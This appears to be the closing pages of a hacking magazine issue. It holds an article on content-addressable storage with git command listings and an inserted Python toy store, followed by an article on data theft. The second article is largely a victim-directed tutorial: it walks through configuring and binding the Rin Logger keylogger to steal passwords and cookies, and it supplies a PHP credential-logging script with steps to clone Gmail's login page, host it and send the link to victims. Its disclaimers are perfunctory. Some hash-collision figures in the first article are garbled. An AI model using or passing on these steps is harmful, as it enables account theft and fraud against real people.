However, CAS systems have their disadvantages as well. If the user wants to modify an already stored object, it involves copying its contents, modification, reading the whole file, hash calculation and a final write. Even if we change just a single byte of a multi-megabyte file, we still need to re-read the whole file and compute a new hash. However, considering current hardware prices, this disadvantage vanishes and is merely theoretical.

The second disadvantage is the existence of hash collisions. Since a hash function produces fixed-length output from input of arbitrary length, loss of information occurs. Therefore multiple different inputs with the same hash exist, and it depends only on the specific implementation of the CAS system how it will handle a collision. The odds that a collision will occur can be estimated from the length of the hash function's output. For example, the MD5 hashing algorithm always returns a 128-bit value. Therefore, the chance that two randomly chosen objects will have the same hash is 1:2^128. 2^128 is also the theoretical upper limit on the number of objects a CAS system can store. However, if someone wants to create his own file, different from ours, with the same hash (preimage attack), he'll need approx. 2^123 computations. The worst situation happens when someone wants to create two arbitrary files with the same hash; in that case, only 2^21 operations will be necessary. Fortunately, there exist more secure algorithms like SHA-1, which has an output size of 160 bits, with no known preimage attack faster than brute force (2^160) and with the fastest collision-discovery attack having complexity 2^61. The danger of using this hashing algorithm is almost non-existent with current technology and knowledge.

And in case you've thought about distributed version control systems when reading this article: you were right. Most of the distributed VCSs use some kind of CAS as backend. I'll use some low-level git commands to demonstrate the basic principles of CAS:
# Create empty git repository
$ git init
Initialized empty Git repository in /tmp/example/.git/
# Objects are stored in .git/objects
$ ls .git/objects/
info pack
# Create example file
$ cat > foo.txt << EOF
Lorem ipsum dolor sit amet.
EOF
# Store example file to database
$ git hash-object -w foo.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b
# We try to manually calculate the SHA-1 hash of the file
# (note: git prefixes the contents with "blob <content_len>\0")
$ echo -e "blob 28\0Lorem ipsum dolor sit amet." | sha1sum
d2cf010d36ff3f5a199c335135f37ca40822b35b
# We see the hashes are equal. Let's look at .git/objects
$ ls .git/objects/*
.git/objects/d2:
cf010d36ff3f5a199c335135f37ca40822b35b

Listing 1. Creating empty git repository.

# Using the content hash, we can request the content.
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
# Filename is not important
$ cp foo.txt bar.txt
$ git hash-object -w bar.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b
# But the content is
$ echo "foobar" > foo.txt
$ git hash-object -w foo.txt
323fae03f4606ea9991df8befbb2fca795e648fa
# And the original file will remain unchanged
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
$ git cat-file -p 323fae03f4606ea9991df8befbb2fca795e648fa
foobar

Listing 2. Creating empty git repository II.

Enterprise solutions use CAS as a backend for a more complex system implementing data replication, retention, secure shredding and other functions; these will be mentioned in following articles.
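The following added example, which is not from the article, restates the CAS principle of Listings 1 and 2 in a few lines of Python. blob_id() computes git's object id exactly the way Listing 1 does by hand (SHA-1 over "blob <length>\0" followed by the content), so its results can be compared with the ids in the listings. ObjectStore is a constructed toy, not Centera or any vendor's implementation, with the three properties the text describes: the filename is metadata beside the object, identical content is stored once, and a stored object cannot silently change, because every read re-hashes the bytes and a scrub pass can find objects that no longer match their id.

```python
"""Toy content-addressed store mirroring the git listings.
Added example (not from the article); the store is a constructed illustration."""
import hashlib


class IntegrityError(Exception):
    """Stored bytes no longer hash to the id they were filed under."""


def blob_id(content: bytes) -> str:
    """git's object id for a blob: SHA-1 of the header "blob <len>\\0" plus the content."""
    header = b"blob %d\x00" % len(content)
    return hashlib.sha1(header + content).hexdigest()


class ObjectStore:
    def __init__(self):
        self._objects = {}   # id -> content
        self._names = {}     # id -> filenames (metadata kept beside the object)

    def put(self, content: bytes, name: str) -> tuple:
        """Store content under its hash.  Returns (id, newly_stored)."""
        oid = blob_id(content)
        new = oid not in self._objects
        if new:
            self._objects[oid] = content
        self._names.setdefault(oid, []).append(name)  # a second name is just more metadata
        return oid, new

    def get(self, oid: str) -> bytes:
        """Read by id, re-hashing on the way out so tampering or bit rot is detected."""
        content = self._objects[oid]
        if blob_id(content) != oid:
            raise IntegrityError(oid)
        return content

    def names(self, oid: str) -> list:
        return list(self._names.get(oid, []))

    def verify_all(self) -> list:
        """Ids whose stored bytes no longer match: what an archive scrub pass reports."""
        return [oid for oid, content in self._objects.items() if blob_id(content) != oid]

    def __len__(self):
        return len(self._objects)


def demo() -> dict:
    """Replay Listings 1 and 2 against the toy store."""
    store = ObjectStore()
    lorem = b"Lorem ipsum dolor sit amet.\n"
    oid1, _ = store.put(lorem, "foo.txt")
    oid2, new2 = store.put(lorem, "bar.txt")        # same content, different name
    oid3, _ = store.put(b"foobar\n", "foo.txt")     # same name, different content
    return {
        "lorem_id": oid1,
        "dedup": oid1 == oid2 and not new2,
        "foobar_id": oid3,
        "objects": len(store),
        "names_of_lorem": store.names(oid1),
        "original_unchanged": store.get(oid1) == lorem,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```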
About the authors
Mr. Miroslav Ludvik graduated from the Czech Technical University in 1996. In 2005 he successfully defended his Ph.D. thesis on Data Security in Computer Networks and was awarded the Ph.D. degree. In 2000 he participated in securing the International Monetary Fund conference in Prague. He provides counseling to the Ministry of the Interior of the Czech Republic and the Czech Data Protection Office. He also provides counseling for the private sector; among his clients are e.g. banks and prestigious legal firms. He teaches at a prestigious private Czech university and cooperates with the University of Žilina. He holds the office of Technical Director in the 4safety, a.s. company.
Mr. Radek Pilar is currently studying at the Czech Technical University, Prague and is employed as a storage consultant in the 4safety, a.s. company.
Data Stealing. Data Theft Prevention. Phishing.
Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner's authorization. In other words, if a company's server has been accessed by a hacker, it is a case of data theft. Even reading your colleague's mail would be taken as a crime in the eyes of the law. It is irrelevant whether you later use this data for misdeeds or not – what counts is that data that is not yours has been accessed without the prior permission of its authorized user, who may also be its creator. "One of the ways of hacking for data stealing is DDoSes, which have evolved from being a blunt-force attack to being a sophisticated diversionary attack disguising another attack." Sources said that financial service companies handling vast amounts of data are most susceptible to these tactics.
"Once the attack was launched, the IT department predictably moved resources to deal with the DDoS attack." While this was happening, the cybercriminals launched the real attack, which allowed them to grab and clone private data that could be used to steal money. They then handed the operation over to the monetization team, who created ATM cards, debit cards and credit cards, which were handed out to money mules. The cybercriminal gang hired individual contractors who took the cards to ATM machines and drained $9m in 48 hours from a selection of accounts in cities across the world.
Figure 1: Data Theft. In the past year, for example, phishing attacks have been directed at IT administrators at European banks. These eventually enabled malware to penetrate the banks' systems and steal login credentials. As soon as the criminals had the login details, they launched the DDoS attacks against the banks. This was carefully timed so that it occurred on a Friday afternoon when IT departments were thinly staffed.
Types of Data Theft
Data can be stolen in many ways. Below you can see a few examples showing the ways of data theft.
Hacking: This is by far the most common way of stealing data, with the least chance of getting caught. A hacker gets into a system where he or she is not supposed to be and steals whatever data he needs. Hackers find their 'gateway' through gaps in the security system or by hoodwinking gullible employees / surfers in order to gain access to a system.
Posing: Appearances can be deceiving. The attractive website that has popped up offering you a great holiday treat may actually be a data thief trying to get into your system under the 'mask' of a piece of harmless spam. In a case of corporate data theft last year, the thief posed as a potential customer and got entry to a company's data bank through the computer of an employee who did not suspect anything in his eagerness to catch a potential client.
Remote Access: Is the cursor moving about on its own even when you have not touched the mouse? Does the indicator show that a program is running even when you are not working on anything and have no windows open? Do not ignore the symptoms – a data thief is already sitting in your computer. Remote access allows the thief to gain control of your machine from wherever he or she is and operate it, steal data from it, and even distribute viruses from it!
Spyware: Spyware is often brought in by adware. The thief may not sit in your system, but your key strokes or mouse clicks would be spied upon, revealing what you are doing and 'reading' the data as you put it in. And you have opened the gate by clicking on an innocent-looking ad.
Podslurping: Music is now stored on iPods for almost all domestic users. You would usually not suspect an employee rocking to music while working as usual. The thief knows this and is using the iPod to obtain data outputs from the computer it is plugged into.
Blue Snarfing: Bluetooth devices have become popular in a very short while. Using his or her Bluetooth-enabled cell phone or laptop, the data thief lifts data from a restricted computer in silence and mostly unnoticed.
Thumbsucking: Another tiny and dangerous device is the USB storage drive. All that an employee needs to do is plug in a pen drive, and 2 GB of data will flow quietly from the computer into a pocket.
Prevent Data Theft
At any time of day or night, a huge amount of data is being stored, retrieved and transferred in the average company or organization. As a responsible user, you must know how to protect your data and prevent data theft from mobile devices. The following are targets for thieves and intruders:
- USB thumb drive
- 3G mobile phone network
- Wireless LAN
- Removable hard disk
- Notebook computer
- Portable personal digital device like MP3 player, PDA, phones
- Printer output etc.
- Personal information such as bank account or card details
- Customer database
- Confidential/sensitive business information, e.g. tender information and quoted prices
The following are some useful security tips for preventing data theft:
- Protect your mobile devices.
- Data theft sometimes happens when you outsource your IT services. Learn how to prevent data loss from IT outsourcing.
- Review the access control policy.
- Encrypt your data.
- Protect your wireless network.
- Secure your company network.
- Conduct security risk assessments and regular security audits.
Figure 2: Preventing data theft.
Keylogger
Key logger software is a computer monitoring system that allows you to record all activities performed on your computer system. Key logger software has the ability to monitor online chat conversation details, visited websites, incoming and outgoing emails and other online activities performed on your PC. The log file created by the key logger can be sent to a specified receiver. Some key logger programs will also record any e-mail addresses you use and Web site URLs you visit. Key loggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, key loggers can also be embedded in spyware, allowing your information to be transmitted to an unknown third party. Computer monitoring software works in invisible mode and does not appear on the Desktop, in Add/Remove Programs or the Control Panel, and is even hidden in the installation path folders. Keylogger software provides the facility to send details of recorded activities to a user-specified email address. A free keylogger download is available on the website.
How to hack IDs with Rin Logger
Run the keylogger file on your PC and click on "Create new".
Figure 3: Create New for creating server.exe file.
Now, enter the information as follows:
Email address: your email address (Gmail recommended)
Account Password: the password of your email address
Keylogger Recipients: enter your email address
Click on Next.
Figure 4: Set information for getting keylogs.
Now, enter the time duration between two emails. If you set it to 2 minutes, you will receive emails every 2 minutes. Hit Next.
Figure 5: Set timing for getting keylogs.
Now, change Install keylogger to "Enabled". Name the file anything you want and select the installation path as "Application data".
Click on the next option, downloader setup, which will help you to download your files off the internet and launch them.
Figure 7: Set Download Setup.
Create a custom message for fooling your victim and click on Next.
Figure 8: Set Dialog setup for setting message for victim.
Click on website viewer enable for getting updates of all the websites which are being visited by the victim.
Figure 9: Set Website Viewer option for update of web links.
Select this option for binding our file with another file and click on Next.
Figure 10: Bind your server.exe file with other file.
This option can help you retrieve passwords from the cookies of the web browser; click on Next.
Figure 11: Set option for stealing cookies from web browser.
Use this option to get administrative control of your victim's system; as per your choice and requirement, just enable it and click on Next.
Figure 12: Use administrative control options.
You can use all other options according to your needs. But I am focusing only on the important aspects. Hit Next until you see this option:
Hit the "?" button beside every textbox to generate random product information. Hit Next.
Figure 13: Bind your server.exe file with other file.
Now, hit "Save As" and select the path where you want to save your keylogger server file. Click on "Compile". Done!!!
Figure 14: Save server.exe file.
That's it. You have successfully created a keylogger server file. Now, simply send this file to your friend. You can use the Binder within this keylogger or can even opt for the IExpress binder to bind this keylogger server to any .exe file, maybe a piece of software or so. This will remove any chance of doubt on the victim's side.
Figure 15: Successfully created file.
Now, simply send this file to your victim via email. The victim will run the file considering it a normal software installation, and during this process our keylogger server will install itself silently in the background without the victim's knowledge. Once the victim runs our keylogger, we will get key logs every 2 min via email, as shown. After keylogger server installation, you will start receiving all the victim's passwords like this:
Figure 16: Online logs on email ID.
Countermeasures
The effectiveness of countermeasures varies, because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. For example, an on-screen keyboard will be effective against hardware keyloggers, transparency will defeat some screen loggers but not all of them, and an antispyware application that can only disable hook-based keyloggers will be ineffective against kernel-based keyloggers. Moreover, keylogger software authors may be able to update the code to adapt to countermeasures that have proven to be effective against them.
Anti keyloggers
An anti keylogger is a piece of software specifically designed to detect keyloggers on a computer, typically comparing all files on the computer against a database of keyloggers, looking for similarities which might signal the presence of a hidden keylogger. As anti keyloggers have been designed specifically to detect keyloggers, they have the potential to be more effective than conventional anti-virus software; some anti-virus software does not consider certain keyloggers a virus, and under some circumstances a keylogger can be considered a legitimate piece of software.
Figure 17: Anti-Keylogger for removing keylogger file.
Phishing
You must have come across many fake login pages/scamming pages which are often used to hack IDs. Phishing is the easiest and the most "unethical way of hacking". It is true that phishing is nothing great that only a few can do, and that is what makes it unethical. But whatever it might be, hacking is hacking, and there is obviously a need to know more about this type of exploitation. Before we go into the details, let us first see what phishing is all about.
How to create your own phishing page
Figure 18: How Phishing works.
Phishing is a way of deceiving your victim by making him log in through one of your webpages which is a clone of the original one. By doing so, the fake webpage will log his E-mail ID and password. After that he will automatically be redirected to the original webpage, making him unsuspicious of what has just happened. This is used for criminal activities such as stealing credit cards etc. That is the exact reason why I DO NOT want you to use this for fraud. Use this only for educational purposes and not to cause any damage to any person in any way.
Phishing is the most popular and widely used method for hacking email accounts, and it is not as easy as its name suggests. Creating a phishing page is an easy task and anyone can download one from various hacking forums for free. The main step of phishing comes after the creation of the fake login page.
Figure 19: Phishing Method.
header('Location: http://www.gmail.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
1. Copy the script above and save it as log.php or login.php.
2. Now open the home page of the site you want to clone.
3. I'm creating a Gmail phishing login page!!
Figure 20: Creating home page of Gmail Fake Page.
4. RIGHT CLICK > Save as; save the page with the name index.html, as in the image.
Figure 21: Saving Gmail fake page with name index.html.
5. Now open it with Notepad and find the word "action" (you can use CTRL + F for that). Delete action=https://accounts.google.com/ServiceLoginAuth and use login.php? in place of the link. Save your script.
Figure 22: Save fake gmail page’s source with name login.php.
NOW YOUR LOGIN.PHP AND INDEX.HTML PAGES ARE READY!
6. Your page is ready for uploading.
7. Create an account on a free webhosting site such as (WWW.MY3GB.COM) or (WWW.5GB.COM).
Figure 23: Create an account on webhosting site like www.my3gb.com.
Upload your phishing page to your webhosting space. You should see something like this:
Figure 24: Upload fake page and php script on webhosting site.
AFTER UPLOADING IT
Now shorten the URL of the INDEX.HTML (NAME.MY3GB.COM/INDEX.HTML) with the Google URL shortener. Next, send the link (GOO.GL____) to the victim and make your victim log in, or send your fake URL of the FB login to your victim's e-mail. Once your victim has logged in on your fake page, JUST RECEIVE THE PASSWORD IN LOG.TXT.
Here are some suggested free web hosting websites. For phishing, cookie stealing and other hacking purposes you need help from web hosting sites. These addresses will help you a lot. Choose your favorite one and sign up; all of them are free.
1. 110mb - http://110mb.com
2. Ripway - http://ripway.com
3. SuperFreeHost - http://superfreehost.info
4. Freehostia - http://freehostia.com
5. Freeweb7 - http://freeweb7.com
6. t35 - http://t35.com
7. Awardspace - http://awardspace.com
8. PHPNet - http://phpnet.us
9. Free Web Hosting Pro - http://freewebhostingpro.com
10. ProHosts - http://prohosts.org
11. FreeZoka - http://www.freezoka.com/
12. 000webhost - http://000webhost.com/
13. AtSpace - http://atspace.com
14. My3gb - http://my3gb.com
15. Zymic - http://zymic.com
Figure 25: Credential hacking.
About the author
VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR was born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his group "hackers4u" on Facebook in 2010, and in two years he has hit the World Wide Web with good ethical hacking articles; he is going to launch a website on Cyber Security & Ethical Hacking and is working with the anti-hacking community "Ihackers4u". The 22-year-old has the capability to compete with the best people in the business so-called "Ethical Hacking". Workshops and Seminars: VIKAS KUMAR has trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Sri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Oman, Yemen, Indonesia, Korea, Iran, etc.
Thank you for reading our magazine from cover to cover. Please share with us your comments about this issue on Twitter: @Hackinsight or Facebook: http://www.facebook.com/hackinsight
Become our Beta Tester and receive each article before publication date!
[email protected]
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.